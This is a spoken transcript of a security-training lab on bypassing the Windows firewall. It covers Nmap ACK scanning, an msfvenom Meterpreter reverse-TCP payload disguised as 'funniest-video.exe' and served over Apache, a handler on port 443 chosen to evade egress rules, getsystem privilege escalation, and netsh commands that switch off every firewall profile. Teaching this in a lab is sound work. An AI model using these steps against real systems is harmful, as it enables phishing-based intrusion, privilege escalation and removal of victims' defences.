Let's bypass the Windows firewall. We're going to try several different techniques. First of all, just make sure Kali and Server 2016 VMs are on. Make sure that KF Sensor from the other activity has been uninstalled, otherwise it will interfere with what we're doing in this activity. Then in Server 2016, we're going to enable Windows Firewall on all profiles, and we're going to create a rule that blocks all inbound connections. So no connections will be allowed from the outside. We'll then switch to Kali and we'll test that. We'll open a terminal and we will attempt an Nmap ACK scan against 2016. We'll type Nmap TAC SCAP-A and then the IP address of server 2016. An ACK scan is a little less likely to be noticed than just a regular SYN scan. We're going to examine the results. If the firewall does what it's supposed to do, it will still not permit us to make any kind of connection. We'll show the ports as being filtered. And then we're going to resort to some social engineering. And we're going to create a payload. And now we've seen this before in another activity. We're doing a slight variation. We're going to use MSF Venom. We're going to create a Windows 64-bit interpreter reverse TCP connection with a 64-bit architecture, producing an executable, telling it to connect back to Kali's IP, to Kali's port 44 or 443, and the output will be something called funniest-video exe. We'll then, if necessary, we're going to set up the web server on Kali. We had it before, but just in case it's not set up now or you had to switch out your Kalis or something, we'll just make sure that we've got the Apache web server on Kali waiting for the connection, because the client, we're going to pretend we've social engineered them and told them to click this link or something. And so we want a web server waiting to deliver them a malicious payload. And we're going to put the funniest video in there as a download for them to go get. And then we'll set up a handler on Kali. In the Metasploit console, we'll set up a handler waiting on 443 for that incoming connection. Now, the reason why we're choosing 443 is because if you have an outbound firewall, and now notice we put restrictions on all inbound connections, but usually firewalls will allow outbound connections, but some firewalls are highly restrictive and they only allow outbound connections to ports that we consider would be used for legitimate business, like the web ports, like 80 and 443. The client is going to use a normal browser, which would be 80, to make the connection to the malicious site. And then when they run this funniest videos, it's going to connect out to 443, which to a firewall's perspective is probably quite fine. It's a normal web port. But the client is actually connecting to something quite malicious. So that's why we're using these ports instead of 4444 or some other classic Metasploit port. So we'll have this handler running and listening. Then we're going to go to Server 2016. We're going to open a browser. We're going to go and get funniest video, and we're going to run it. And we'll switch to Kali and we'll verify that they made a connection to us. And we'll just run a few commands to verify that we have a connection. We're going to see who we are using the getuid command. We're going to escalate our privilege from administrator to system level and then verify that. And then we're going to use just some built-in Microsoft commands to turn off the victim's firewall. So now we've totally told them to drop their firewall. Meanwhile, the user has no idea that any of this has happened. So these are the things that we're going to do here to bypass the Windows firewall. So I have Kali running and I have Server 2016 running. And let's just make sure that KF Sensor is uninstalled, otherwise it's going to cause trouble. I am going in Server 2016. I'm just going to go to the control panel, make sure that KF Sensor is gone. So I'm going to Programs and Features in the control panel, and I can see that KF Sensor is totally uninstalled. Great. That's the first thing we want to do because we don't want that artifact from the other activity. Now with that, let me also just make sure that the firewall, so I've got the KF Sensor is gone. Now let me enable Windows Firewall on all profiles, and I'm going to create a rule that blocks all inbound connections. So from here, we're just going to go to Windows Firewall. We don't need to go to Windows Firewall with Advanced Security, just normal Windows Firewall. I'm clicking Start, and I'm just typing Windows. Well, I need to click in the proper thing. I'm typing Windows, come on. Windows Firewall. Okay. I don't need with Advanced Security. That's more complex than what we need for this activity. So just Windows Firewall. And it's off at the moment. Let me just turn it on. So you can see I'm in Control Panel Windows Firewall. So let me just turn Windows Firewall on or off. Turn it on, on, and click OK. Now let's also set up a rule that just basically blocks all inbound connections so that we can't make any connection from the outside. I'm going to allow an app or feature through Windows Firewall, but we can also set a rule that says nothing. So click that and make sure that block all incoming connections, private and public, and if you have a domain, but you won't in your lab, block all incoming connections is checked, and click OK. And so we're all set. Now we can prove that this is working by switching over to Kali. I'm going to go over to Kali, and let me just go into Kali Tour. And from Kali, I'm going to open a terminal, and let me just zoom in a little bit. And I'm just going to do a normal Nmap scan right now, and we can see that the ports will show as filtered. So Nmap, and then 192.168.75.16. That's the IP address of server 2016. Hit it. In a moment, it's going to come back and show that nothing's open, or at least if the firewall is doing what it's supposed to do, it will show that. It will show that all ports are filtered. Filtered means we had no response of any kind. Now, this, of course, will be weird because we'll show that the host is up. And this is because Nmap does not do a ping, instead it does an ARP scan. So we can see that the host is up because it sent an ARP packet to the IP address, and ARP, being a layer 2 protocol, usually falls below what any firewall is going to work at. We can see that all 1000 scan ports are filtered. We have nothing up. Okay, let's try the same thing now, but as an ACK scan. And now, even though the technical syntax, or the syntax technically for Nmap is Nmap options target, you can put the options afterwards, and it still works fine. TAC S cap A. So press enter. So what we're doing now is, rather than doing a SYN packet, we're sending an ACK packet to see what kind of response, if we get any kind of response whatsoever from the host. Take just a moment. We're going to examine the output as soon as it comes. Okay, we're done with the ACK scan. And of course, the ACK scan shows that the host is up because of the ARP scan. But again, all 1000 scan ports are filtered. The ACK scan is less likely to be discovered by an IDS, but kind of depends on the IDS. All right, so we know that it's filtered. So we're going to have to resort to a little social engineering. And we're going to have to get a victim to connect out past the firewall to us, which is typically what happens in a real environment. So what we're going to do is we're going to create a payload. And we're going to use MSF Venom to do it. So here I am on Kali. I'm just going to type clear, and I'm going to type MSF Venom, TAC P for payload, Windows /x64/meterpreter /reverse _TCP, TAC A for architecture, x64, TAC F for file type, it's an executable. The listener host, lhost equals Kali's IP, 192.168.75.156. Yours will be different. Well, maybe it'll be the same as mine, not likely. The listening port, please connect to Kali on 443 so that your firewall or the company firewall thinks nothing of an outbound 443 connection. TAC small o output in the root profile /root/ capital desktop /funniest tacvideo.exe. Enter. And it will create the payload in a moment, and it'll be about, 10K in size, won't be big at all. In the meantime, while that's running, okay, there it goes, there it goes. Not even 10K, 7 kilobytes in size, great. All right, now let's just make sure that the web server is all set up. I'm going to scroll down here a little bit. What we're going to do is, in case we don't already have these, and we should from a different activity, we're going to make a directory as a subdirectory under the Apache web server. Now, Apache web server by default keeps its stuff in var www html. That's the path. We're going to make sure that there's a subdirectory called share. We're then going to set permissions so that the owner can do anything and everybody else can read and execute. And then we're going to change ownership to allow Apache to manage this thing. And then we're going to move, or copy rather, not move, the funniest video executable to that share. And we're just going to, as a matter of fact, we're going to restart Apache. We shouldn't probably have to do that, but whenever you change security, you often have to reset the service. So let's, first of all, let's see if it's there. Let's cd var www html and ls, and the directory share is already there. But if it didn't exist, we would mkdir, make directory, var www /html/share, enter. And it says it already exists, but just in case you didn't have it, you create it. And then we're going to change mode, chmod, and we're going to recursively say, change it to 755 so the owner has full permission, and then the owner's group and the whole rest of the world have read and execute, to var www html share. So change permissions, oh, not chmod, sorry. Not chmod, it's chmod. Enter. Okay, we've set permissions. Let's just change ownership. Probably not necessary if you still have this left over from before. Data, www, tech data, to this folder, var /www/html/share. Enter. Okay. And let's now copy funniest video, because we created funniest video here. Let's copy that now with the cp command, the copy command. cp/root/desktop/funniest techvideo.exe to space /var/www/html/share. Hit it. Okay. And if we cd, or excuse me, if we, I didn't mean to do that. Let me go through my history. If we ls, I can see share. If we cd into share, and we ls again, there it is. There's funniest video, all waiting for the victim. Okay, so now let's restart Apache because we changed some permissions. Service Apache 2 restart. Hope that's a command. Okay. All right, now that we've got that, let's start the Metasploit console. Let's start a listener. So we'll just type msf console. You could also click the blue M shield looking thing. It's a blue shield with a white M in the middle. If you wanted to, it would start the console just like this command. They both start the same console. All right, so let's start a handler. Use multi/handler. It will load that. Let's set the payload to Windows / and you know what? I'd better make this bigger so that you can see this. Let me just expand this now. Kali doesn't always like to expand properly. I just minimize that. Let me create a new window. Let me xrandr TAC-S 1280 by 1024. Just make this guy a little bit bigger. Okay, so let me minimize that and bring back. I right-clicked to the Windows. Let me bring back the Metasploit console. Okay, so just so you can see a little bit easier here. And my command here, I'm going to set payload Windows x64 interpreter reverse TCP Windows x64 interpreter reverse reverse underscore TCP. The reason why reverse TCP is because we want the victim to come out past the firewall back to us. Okay, now let's tell it to connect to Kali and to connect to Kali's 443. As I've said before, the handler, whatever's set up in the handler, must agree with whatever's set up in the malicious payload. They have to agree. So let us set the listener host. Now, Metasploit console is not case sensitive, unlike the bash. So I can be lazy and just say set lhost, and I don't need equals. I don't need the equal sign here. Set lhost 192.168.75.156, telling the victim to come back to Kali. Set the listener port to 443. Now, when the victim first opens the browser to get the malicious payload, they're using port 80, which any outbound firewall should permit. And then when they make the next connection from the malicious payload, they're coming to 443, which again, any outbound firewall should permit. So show options, we should be good. All right, there's nothing here that requires something that doesn't have something already. Run. Okay, so the handler is ready and waiting. It's waiting. And if we come we're going to switch over now to 2016, we're going to open a browser to Kali's IPs, share, we're going to run funniest video, and we're going to see how we got a interpreter session if all goes well. Let me switch over now to server 2016. And I'm going to just kind of make this window a little bit smaller so we can hopefully watch what's going on at the same time. Let me just scoot this over, kind of watch side by side. I'm just going to open a browser here. I'll open Opera. I like using Opera for a lot of things because it's not as restrictive as Chrome or Internet Explorer. So I can do a lot of interesting things with Opera. So just starting out fresh again, because my browser remembered from last time. So I am going to http://192.168.75.156. Enter. And, oh no, share, of course. So we pretend that we have already sent the user a link or an email or an SMS or something to trick them into going to this share. And they come here and they see the funniest video. And they click the funniest video and they save the funniest video. And we open this up. I already had an artifact. And we run it. And as they run it, sure enough, Meterpreter pops open. They make a connection out past their firewall to us. They're not allowing any inbound connections. And in case they have restrictive outbound connections, we chose the most likely connections, or the most likely ports that they will be permitted to connect to. So now the thing to do is to just verify where we are, what we are. Let's sysinfo. And you can see that we have connected to server 2016. Let's get UID. Who are we at the moment? Aha, it was the administrator who was foolhardy enough to do this. Now, usually the administrator, we can run a local exploit called get system, which will elevate us from administrator to system privilege, which is the highest level privilege. Press enter. And it says, aha, we got system via a name pipe impersonation technique. Scroll this over in the memory in the administrator. If we once again say get UID, aha, now I am no longer server 2016 admin. I am NT authority system. I'm as high as it gets. Okay, now let's drop to a shell and get the Windows command prompt, and let's use simple net shell commands. We'll go to net shell advanced firewall, set all profiles state off. In other words, in all profiles of the firewall, their firewall's off. And then we can use a simple net shell firewall. We don't have to use advanced firewall show, and we can prove that it's off. So let's do that. Net sh adv firewall set all profiles state off. Enter. Oh, we have to drop to a shell first, sorry. Shell, enter. This drops us to a Windows command prompt. Notice how we are no longer in the Meterpreter prompt, we are now in the Windows command prompt. And I know it's in system privilege because it doesn't say administrator, it says system 32. Okay, now from here, net shell, advanced firewall, set all profiles state off. Enter. Okay, now shall we prove that it's off? Net shell firewall show. And we can see it's off. There's no commands available. We can validate that by going over to Server 2016 and going into the firewall here. Just click this and we can go to the control panel and we'll find the firewall down at the bottom, Windows Firewall, and ta-da, it's off. And that is how we bypass a firewall.